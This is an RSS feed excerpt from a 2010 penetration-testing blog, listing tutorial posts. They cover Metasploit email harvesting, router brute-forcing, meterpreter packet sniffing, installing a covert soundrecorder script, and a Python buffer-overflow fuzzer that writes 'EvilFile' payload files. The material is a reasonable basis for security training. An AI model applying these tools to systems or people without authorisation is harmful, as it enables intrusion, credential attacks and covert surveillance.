/&gt;# Tested on ibook OS X 10.4.11 (ibook g4)&lt;br /&gt;#&lt;br /&gt;#######################################################&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;http://securityreason.com/exploitalert/8022</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ EBOOKS ] : BUFFER OVERFLOW (EGG-HUNTER)</title><link>http://pentest101.blogspot.com/2010/03/ebooks-buffer-overflow-egg-hunter_23.html</link><category>EBOOKS</category><author>noreply@blogger.com (pentest101)</author><pubDate>Tue, 23 Mar 2010 01:10:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-6701179291989683269</guid><description>we have today a good book about egg-hunter technique &lt;br /&gt;you can download it from here :&lt;br /&gt;&lt;br /&gt;--- http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf&lt;br /&gt;&lt;br /&gt;this book is not mine.&lt;br /&gt;email author : mmiller@hick.org</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ BUFFER OVERFLOW ] : metasploiT anD remotE buffeR overfloW</title><link>http://pentest101.blogspot.com/2010/03/buffer-overflow-metasploit-and-remote.html</link><category>BUFFER OVERFLOW</category><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 22 Mar 2010 03:48:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-8538257949014321298</guid><description>&lt;iframe src="http://player.vimeo.com/video/15101360" width="400" height="300" frameborder="0"&gt;&lt;/iframe&gt;&lt;p&gt;&lt;a href="http://vimeo.com/15101360"&gt;MSF &amp; Remote buffer overflow&lt;/a&gt; from &lt;a href="http://vimeo.com/user3376480"&gt;Pentest101 Team&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ BACKTRACK ] : Paros Proxy ...</title><link>http://pentest101.blogspot.com/2010/03/backtrack-paros-proxy.html</link><category>BACKTRACK</category><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 22 Mar 2010 03:45:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-1408700180112039358</guid><description>Paros Proxy ...&lt;br /&gt;&lt;br /&gt;hi all ...&lt;br /&gt;&lt;br /&gt;&lt;embed src="http://blip.tv/play/AYHH_2EC" type="application/x-shockwave-flash" width="400" height="330" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://pentest101.blip.tv" target="_blank"&gt;blip.tv&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ BACKTRACK ] : Maltego &amp;lt;&amp;lt; information gathering &amp;gt;&amp;gt; ...</title><link>http://pentest101.blogspot.com/2010/03/backtrack-maltego-information-gathering_22.html</link><category>BACKTRACK</category><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 22 Mar 2010 03:42:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-7869920477025529759</guid><description>Maltego [ information gathering ] ...&lt;br /&gt;&lt;br /&gt;hi all ...&lt;br /&gt;&lt;embed src="http://blip.tv/play/AYHH%2BnMC" type="application/x-shockwave-flash" width="400" height="330" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://pentest101.blip.tv" target="_blank"&gt;blip.tv&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ BACKTRACK ] : bruteforcE routeR witH xhydrA ...</title><link>http://pentest101.blogspot.com/2010/03/backtrack-bruteforce-router-with-xhydra.html</link><category>BACKTRACK</category><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 22 Mar 2010 03:40:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-1001590636037934308</guid><description>bruteforcE routeR witH xhydrA ...&lt;br /&gt;&lt;br /&gt;&lt;embed src="http://blip.tv/play/AYHHlx8C" type="application/x-shockwave-flash" width="400" height="330" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://pentest101.blip.tv" target="_blank"&gt;blip.tv&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total></item><item><title>[ METASPLOIT ] : meterpreteR as a servicE ...</title><link>http://pentest101.blogspot.com/2010/03/metasploit-meterpreter-as-service.html</link><category>METASPLOIT</category><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 22 Mar 2010 03:36:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-801372675153219271</guid><description>meterpreter as a service ...&lt;br /&gt;hi all ...&lt;br /&gt;&lt;embed src="http://blip.tv/play/AYHD1BYC" type="application/x-shockwave-flash" width="400" height="330" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;br /&gt;&lt;a href="http://pentest101.blip.tv" target="_blank"&gt;blip.tv&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ METASPLOIT ] : Packet Sniffing with Meterpreter ...</title><link>http://pentest101.blogspot.com/2010/03/metasploit-packet-sniffing-with.html</link><category>METASPLOIT</category><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 22 Mar 2010 03:32:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-2538303003633256136</guid><description>Packet Sniffing with Meterpreter ...&lt;br /&gt;&lt;br /&gt;&lt;embed src="http://blip.tv/play/AYHD02QC" type="application/x-shockwave-flash" width="400" height="330" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;br /&gt;&lt;br /&gt;http://pentest101.blip.tv</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ METASPLOIT ] : searcH emaiL collectoR</title><link>http://pentest101.blogspot.com/2010/03/metasploit-search-email-collector_22.html</link><category>METASPLOIT</category><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 22 Mar 2010 03:30:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-5080257634962237370</guid><description>searcH emaiL collectoR ... by mr-gefara (my friend)&lt;br /&gt;&lt;br /&gt;http://p3ntest.blip.tv/&lt;br /&gt;&lt;br /&gt;http://blip.tv/file/3171290&lt;br /&gt;&lt;blockquote&gt;svn co http://www.metasploit.com/svn/framework3/trunk/modules/auxiliary/gather&lt;br /&gt;cp -r gather /pentest/exploits/modules/auxiliary&lt;br /&gt;go to msfconsole&lt;br /&gt;search gather&lt;br /&gt;use gather/search_email_collector&lt;br /&gt;show options&lt;br /&gt;set domain yoursite.com&lt;br /&gt;run&lt;/blockquote&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ METASPLOIT ] : changE youR meta BnneR</title><link>http://pentest101.blogspot.com/2010/03/metasploit-change-your-meta-bnner.html</link><category>METASPLOIT</category><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 22 Mar 2010 03:24:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-1145641273409599013</guid><description>changE youR metasploiT banneR ...&lt;br /&gt;hi,every one&lt;br /&gt;&lt;a href="http://img137.imageshack.us/img137/1222/bannerkt.png"&gt;&lt;img alt="" height="300" src="http://img137.imageshack.us/img137/1222/bannerkt.png" title="banner" width="400" /&gt;&lt;/a&gt;&lt;br /&gt;wath tutorial :&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;embed allowfullscreen="true" allowscriptaccess="always" height="330" src="http://blip.tv/play/AYHBr0kC" type="application/x-shockwave-flash" width="400"&gt;&lt;/embed&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://pentest101.blip.tv/" target="_blank"&gt;blip.tv&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ PYTHON ] : local buFF fuzz tools</title><link>http://pentest101.blogspot.com/2010/03/python-local-buff-fuzz-tools.html</link><category>PYTHON</category><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 22 Mar 2010 03:20:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-5988726691076185655</guid><description>local buFF fuzzeR tools (python) ...&lt;br /&gt;hi ,every one ...&lt;br /&gt;To speed up your work&lt;br /&gt;[+] fuzz1.py&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;blockquote&gt;#!/usr/bin/python&lt;br /&gt;# coded by data$hack 2010&lt;br /&gt;# usage : python fuzz1.py&lt;br /&gt;import os&lt;br /&gt;import sys&lt;br /&gt;os.system("cls")&lt;br /&gt;d = raw_input("badchar [exemple (A)] : ")&lt;br /&gt;g = d&lt;br /&gt;g += " * ? [exemple (15000)] : "&lt;br /&gt;b = input(g)&lt;br /&gt;s = raw_input("file extension [exemple (m3u)] : ")&lt;br /&gt;a = '\x41' * b;&lt;br /&gt;k = "EvilFile."&lt;br /&gt;k += s&lt;br /&gt;try:&lt;br /&gt;fileHandle = open(k,'w')&lt;br /&gt;fileHandle.write ( a )&lt;br /&gt;fileHandle.close()&lt;br /&gt;except:&lt;br /&gt;print "error check something ..."&lt;br /&gt;sys.exit("")&lt;br /&gt;print "\nfile created succ ..."&lt;/blockquote&gt;&lt;img alt="" class="mceWPmore mceItemNoResize" mce_src="https://pentest101.wordpress.com/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" src="https://pentest101.wordpress.com/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" title="More..." /&gt;&lt;br /&gt;[+] md5 maker :&lt;br /&gt;&lt;blockquote&gt;import hashlib&lt;br /&gt;import os&lt;br /&gt;import string&lt;br /&gt;os.system("cls")&lt;br /&gt;d = input("give me a number : ")&lt;br /&gt;k = 0&lt;br /&gt;j = 0&lt;br /&gt;while (k &amp;lt; d):&lt;br /&gt;k = k + 32&lt;br /&gt;j = j + 1&lt;br /&gt;i = 0&lt;br /&gt;cat = ""&lt;br /&gt;while (i &amp;lt; j): i += 1 m = hashlib.md5() # don't forget to "import hashlib" m.update(str(i)) md5 = m.hexdigest() cat += md5 n = len(cat) while (n &amp;gt; d+1):&lt;br /&gt;n = len(cat)&lt;br /&gt;kl = cat[n-1]&lt;br /&gt;cat = cat.rstrip(kl)&lt;br /&gt;fileHandle = open ('md5.md5','w')&lt;br /&gt;fileHandle.write ( cat )&lt;br /&gt;fileHandle.close()&lt;/blockquote&gt;ftp fuzzer by pentest101 [very soon]&lt;br /&gt;[*] finish ...&lt;br /&gt;have fun ...</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>[ METASPLOIT ] : Add soundrecorder meterpreteR script to metasploit3 ...</title><link>http://pentest101.blogspot.com/2010/03/metasploit-add-soundrecorder.html</link><category>METASPLOIT</category><author>noreply@blogger.com (pentest101)</author><pubDate>Mon, 22 Mar 2010 03:14:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-331713295801218905.post-3520301676918896281</guid><description>Add soundrecorder meterpreteR script to metasploit3 ...&lt;br /&gt;hi every one ...&lt;br /&gt;[+] open terminal :&lt;br /&gt;&lt;blockquote&gt;su&lt;br /&gt;http://www.darkoperator.com/meterpreter/soundrecorder.zip&lt;br /&gt;unzip soundrecorder.zip&lt;br /&gt;cp soundrecorder/soundrecorder.rb /opt/metasploit3/msf3/scripts/meterpreter &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; [your meta location]&lt;/blockquote&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;blockquote&gt;cp soundrecorder/linco.exe /opt/metasploit3/msf3/data&lt;br /&gt;cp soundrecorder/oggenc.exe /opt/metasploit3/msf3/data&lt;br /&gt;meterpreter soundrecorder by pentest101 [&lt;a href="http://pentest101.wordpress.com/2010/01/15/metasploit-meterpreter-soundrecorder/" mce_href="http://pentest101.wordpress.com/2010/01/15/metasploit-meterpreter-soundrecorder/" target="_blank"&gt;here&lt;/a&gt;] ...&lt;br /&gt;[*]&amp;nbsp; finish ...&lt;/blockquote&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item></channel></rss>